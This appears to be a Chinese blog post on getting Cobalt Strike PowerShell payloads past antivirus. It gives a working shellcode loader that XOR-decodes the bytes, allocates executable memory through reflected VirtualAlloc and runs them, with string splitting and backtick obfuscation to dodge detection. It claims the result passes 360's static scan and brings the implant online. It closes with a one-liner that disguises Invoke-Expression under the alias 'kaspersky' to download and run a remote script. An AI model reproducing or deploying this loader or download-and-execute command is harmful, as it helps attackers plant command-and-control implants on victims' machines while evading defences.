cs免杀（一）

最新推荐文章于 2024-08-13 08:42:16 发布

GTA6

最新推荐文章于 2024-08-13 08:42:16 发布

阅读量643

点赞数

分类专栏： tools

本文链接：https://blog.csdn.net/kuuhh/article/details/119646885

版权

tools 专栏收录该内容

5 篇文章 0 订阅

订阅专栏

前言

网上搜了几篇文章复现下操作。

ps1文件免杀

生成ps1文件
将关键字FromBase64String括号内的字符串复制起来。

将下面代码保存改为ps1文件执行

$string = ''
$s = [Byte[]]$var_code = [System.Convert]::FromBase64String('刚刚复制的字符串')
$s |foreach { $string = $string + $_.ToString()+','}
$string > d:\1.txt

代码输出到1.txt
powershell -ExecutionPolicy bypass -File .\2.ps1

将1.txt 的内容复制如下指定位置，记得把最后一个逗号去掉。

Set-StrictMode -Version 2

$DoIt = @'
function func_b {
	Param ($amodule, $aprocedure)		
	$aunsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.Uns'+'afeN'+'ativeMethods')
	$agpa = $aunsafe_native_methods.GetMethod('GetP'+'rocAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
	return $agpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($aunsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($amodule)))), $aprocedure))
}

function func_a {
	Param (
		[Parameter(Position = 0, Mandatory = $True)] [Type[]] $aparameters,
		[Parameter(Position = 1)] [Type] $areturn_type = [Void]
	)

	$atype_b = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('Reflect'+'edDel'+'egate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDeleg'+'ateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
	$atype_b.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $aparameters).SetImplementationFlags('Runtime, Managed')
	$atype_b.DefineMethod('Inv'+'oke', 'Public, HideBySig, NewSlot, Virtual', $areturn_type, $aparameters).SetImplementationFlags('Runtime, Managed')

	return $atype_b.CreateType()
}

[Byte[]]$acode =  [Byte[]](1.txt的代码)

for ($gg = 0; $gg -lt $acode.Count; $gg++) {
	$acode[$gg] = $acode[$gg] -bxor 35
}

$ava = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_b kernel32.dll VirtualAlloc), (func_a @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$abuffer = $ava.Invoke([IntPtr]::Zero, $acode.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($acode, 0, $abuffer, $acode.length)

$arunme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($abuffer, (func_a @([IntPtr]) ([Void])))
$arunme.Invoke([IntPtr]::Zero)
'@

If ([IntPtr]::size -eq 8) {
	start-job { param($a) ie`x $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job
}
else {
	i`ex $DoIt
}

静态免杀以及上线
命令：powershell -ExecutionPolicy bypass -File .\payload.ps1
360

远程执行powershell命令

powershell set-alias -name kaspersky -value Invoke-Expression;kaspersky(New-Object Net.WebClient).DownloadString('http://ip:3333/2.ps1')

参考

https://www.cnblogs.com/forforever/p/13882312.html
https://mp.weixin.qq.com/s?src=11&timestamp=1628746375&ver=3247&signature=44ALMq0jE6wyHmL6bZw6QubeTGRegRJdHEuh8SRanArIdrI2ce6HisU0Zm1Ys-dx3MjOJxdb7Y5FP4QDlhofh1zIU2Q7PMvOsMsANa1449pm8oG9eyvMdjRNFUDphXi-&new=1